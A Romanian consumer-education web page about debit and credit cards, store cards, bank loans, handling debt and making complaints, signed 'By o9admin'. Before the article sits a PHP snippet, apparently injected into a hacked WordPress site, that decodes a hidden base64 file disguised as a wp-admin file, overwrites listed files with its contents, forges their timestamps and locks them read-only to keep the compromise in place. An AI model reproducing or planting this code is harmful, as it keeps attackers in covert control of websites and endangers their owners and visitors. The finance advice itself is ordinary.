$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } CREDITE – ÎMPRUMUTURI – CARDURI – O noua atitudine

Putem trăi fără bani? Dacă nu ar exista banii, am face şi astăzi schimb, precum strămoşii noştri. Banii ne fac viaţa mai uşoară şi nu e vorba doar de mărunţişul din buzunar sau de bancnotele din portofel.
În zilele noastre, există multe alte instrumente financiare:
puteţi face cumpărături utilizând carduri de credit sau de debit.
Ele vă permit să plătiţi cu banii pe care-i aveţi în conturi sau în depozite bancare, ori cu banii obţinuti din împrumuturi bancare sau excedente de cont.
Administrarea corectă a propriilor fonduri este extrem de importantă.
Tot mai mulţi consumatori fac cheltuieli peste posibilităţile lor financiare, folosind cărţi de credit, împrumuturi şi excedente de cont înglodându-se până la urmă în datorii. Din această cauză, viaţa lor, a familiei lor şi planurile lor financiare de viitor au mult de suferit.

CARD DE DEBIT
Cecurile şi cardurile de debit îţi permit să cheltuieşti banii pe care îi ai într-un cont bancar. Nu mai trebuie să porţi după tine sume mari de bani şi sunt din ce în ce mai mulţi cei care fac cumpărături în acest fel.
Unii experţi financiari sunt de părere că, în viitor, nu vom mai purta nici un ban cu noi, ci doar carduri de debit, chiar şi pentru a face cele mai neînsemnate cumpărături.
Când foloseşti un card de debit, ţi se cere să introduci un cod PIN (număr personal de identificare). Trebuie să ţii minte acest număr!
Nu-l scrie şi nu-l păstra în portofel, de unde ţi l-ar putea lua vreun hoţ. De asemenea, e bine să eviţi codurile PIN de genul 1234 sau
datele de naştere.

CARD DE CREDIT
Cardurile de credit sunt adesea foarte utile, fiind o modalitate convenabilă şi sigură de a cumpăra bunuri şi servicii, mai ales dacă, în
acel moment, nu ai suficienţi bani.

La început, erau emise numai de bănci şi de alte instituţii financiare, dar acum supermarket-urile, liniile aeriene şi chiar organizaţiile de caritate pot avea propriile lor carduri de credit cu marca înregistrată.
Există două tipuri de carduri de credit.
În primul caz, valoarea creditului trebuie achitată integral în fiecare lună şi nu se percepe dobândă la banii împrumutaţi.
În al doilea caz, valoarea creditului nu trebuie să fie neapărat rambursată lunar; creditul se poate prelungi de la o lună la alta, iar
deţinătorul cardului plăteşte o dobândă.
Pentru sumele împrumutate, se calculează o dobândă, plus o taxă de penalizare, în cazul întârzierilor la plată.

Dobânda variază de la card la card, iar majoritatea emitenţilor de cărţi de credit acordă o perioadă cu dobândă zero, numai pentru cumpărături. Însă, dacă îţi foloseşti cardul pentru a obţine bani lichizi, se vor aplica taxe suplimentare şi/sau dobânzi.

CARD DE CREDIT – AVANTAJ/DEZAVANTAJ?
Îmbrăcăminte, electronice sau electrocasnice, excursii etc.
Vrei să le ai pe toate? O soluţie simplă, la prima vedere, este să împrumuţi nişte bani.
E uşor să obţii un card de credit:
primeşti şi completezi un formular de la o instituţie financiar bancară şi îl depui împreună cu o copie după actul de identitate şi adeverinţa de venit. Dar ai grijă, aceasta este una din cele mai scumpe forme de împrumut! Dacă nu plăteşti imediat datoria, plăteşti dobândă – uneori foarte  mare – şi ai toate şansele să te trezeşti copleşit de un munte de datorii.

ATENŢIE LA CE SCRIE CU LITERE MICI !

Pe lângă dobândă, cardurile de credit implică şi alte costuri.
Fii atent la următoarele:
– penalităţile pentru întârzierea plăţii;
– taxele pentru sumele în numerar, primite în avans;
– taxa anuală etc.

CARDURI PENTRU MAGAZINE
Ai un magazin preferat şi faci des cumpărături de acolo?
Ai şansa ca, la un moment dat, să ţi se ofere reduceri de preţuri dacă soliciţi un card de credit al magazinului. Este tentant, dar ai grijă, pentru că, uneori, rata procentuală anuală ajunge la 30% – mult mai mare decât la alte carduri de credit. Dacă achiţi întreaga sumă înainte de încheierea perioadei fără dobândă, atunci acesta poate fi un mod convenabil de a face cumpărături. S-ar putea să ţi se ofere o reducere de preţ şi chiar să fii invitat în avanpremieră la reducerile de sezon, să primeşti reviste şi detalii despre ofertele speciale. Dar, dacă nu achiţi întreaga sumă, ai toate şansele să ajungi dator.

ÎMPRUMUTURI BANCARE
Împrumutul bancar este un alt mod de a împrumuta bani şi, de obicei, are un nivel mai scăzut al dobânzilor decât cel oferit de companiile care emit carduri de credit. Împrumuţi o sumă stabilită şi o primeşti integral.
De regulă, împrumuturile bancare se fac pentru achiziţionarea unor bunuri scumpe, de exemplu o maşină sau o casă. Te angajezi să achiţi împrumutul în rate lunare, pe o perioadă fixă de timp, care poate varia.
Dacă nu plăteşti ratele, rişti să pierzi bunurile cu care ai girat sau să fii dat în judecată şi să fii înregistrat ca rău-platnic de instituţiile financiare specializate. Prin urmare, în viitor îţi va fi greu să mai obţii un card de credit sau un împrumut.

DATORIA
E uşor să faci datorii, dar e mult mai greu să scapi de ele.
Datoriile sunt o problemă pentru mulţi care, dintr-un motiv sau altul, au cheltuit peste posibilităţile lor şi nu au cum să plătească banii pe care îi datorează.

NIVELUL DE CREDITARE
Dacă faci datorii, nu vei putea ascunde prea mult timp acest lucru. Instituţia financiar bancară de la care ai creditul sau împrumutul
transmite informaţia la instituţiile specializate privind gestionarea bazei de date privind rău-platnicii.
Pe viitor, de fiecare dată când vei solicita un credit, compania la care apelezi va lua legătura cu Centrala Riscurilor Bancare, pentru a-ţi afla antecedentele, istoria personală a plăţilor.
Dacă nu ai reuşit să achiţi creditele sau dacă ai depăşit fără autorizaţie limita contului, credibilitatea sau bonitatea ta va fi mică, iar şansele tale de creditare vor fi foarte scăzute şi ţi se vor refuza alte credite.
Acest lucru poate reprezenta un obstacol în obţinerea unor împrumuturi sau garanţii bancare în viitor, chiar dacă situaţia ta
financiară va fi mult mai bună.

De aceea, este important să stai de vorbă cu cei cărora le datorezi bani.
Dacă reuşeşti să închei un acord pentru a le returna banii în rate mici şi într-o perioadă mai lungă de timp, atunci credibilitatea ta, deci şi şansele de creditare, ar putea să nu fie afectate.

UN OM PREVENIT FACE CÂT DOI

CE NU TREBUIE SĂ FACI CÂND AI DATORII:
– nu te ascunde după deget! Nu te face că nu vezi cum îţi cresc datoriile şi nu le ignora – ele nu vor dispărea de la sine, iar situaţia va deveni din ce în ce mai dramatică;

– nu lăsa nedeschise plicurile cu facturi sau extrase de cont!
– nu încerca să împrumuţi şi mai mulţi bani ca să îţi plăteşti toate datoriile, fără să te consulţi mai întâi cu un consilier financiar.

CE TREBUIE SĂ FACI CÂND AI DATORII:
– cere sfaturi şi ajutor înainte ca situaţia să scape de sub control; există organizaţii de caritate sau organizaţii ale consumatorilor, care te pot ajuta;
– menţine o relaţie bună cu finanţatorul;
– înţelege că majoritatea creditorilor sunt dispuşi să discute cu tine despre problemele pe care le ai şi sunt pregătiţi să accepte un plan realist de plată a datoriei;
– acţionează! Ia legătura cât mai curând cu cei cărora le eşti dator; cu cât află mai repede problema, cu atât ai şanse mai mari să te înţeleagă şi să găsiţi împreună o cale de returnare a datoriilor.

Informaţii:
www.anpcppsr.ro
www.bnr.ro
www.dolceta.eu

CUM PUTEŢI FACE O RECLAMAŢIE EFICIENTĂ
– Nu aveţi reţineri.
– Aflaţi care sunt drepturile dvs. înainte de a porni la drum.
– Obţineţi mai repede ceea ce doriţi, dacă vă păstraţi calmul!
– Prezentaţi faptele exact, fără alte comentarii.
– Spuneţi ce pretindeţi: scuze, înlocuirea produsului, restituirea banilor servicii mai bune sau compensaţii.
– Vorbiţi numai cu cineva care are autoritatea de a acţiona.
– Păstraţi într-un dosar toate informaţiile de care veţi avea nevoie:
reclame, comenzi, chitanţe, certificate de garanţie, instrucţiuni de folosire, cărţi tehnice, dovada de plată, scrisori, datele la care au avut loc discuţiile şi numele persoanelor cu care aţi vorbit.
– Dacă trebuie să trimiteţi oricare dintre aceste documente companiei în cauză, trimiteţi o copie şi păstraţi originalul.
– Acţionaţi rapid, imediat ce aţi descoperit problema.
– Prezentaţi-vă de fiecare dată: numele, adresa, numărul de telefon şi adresa de e-mail, alături de numărul de dosar la compania respectivă, dacă este cazul.

– NU AMÂNAŢI !

By o9admin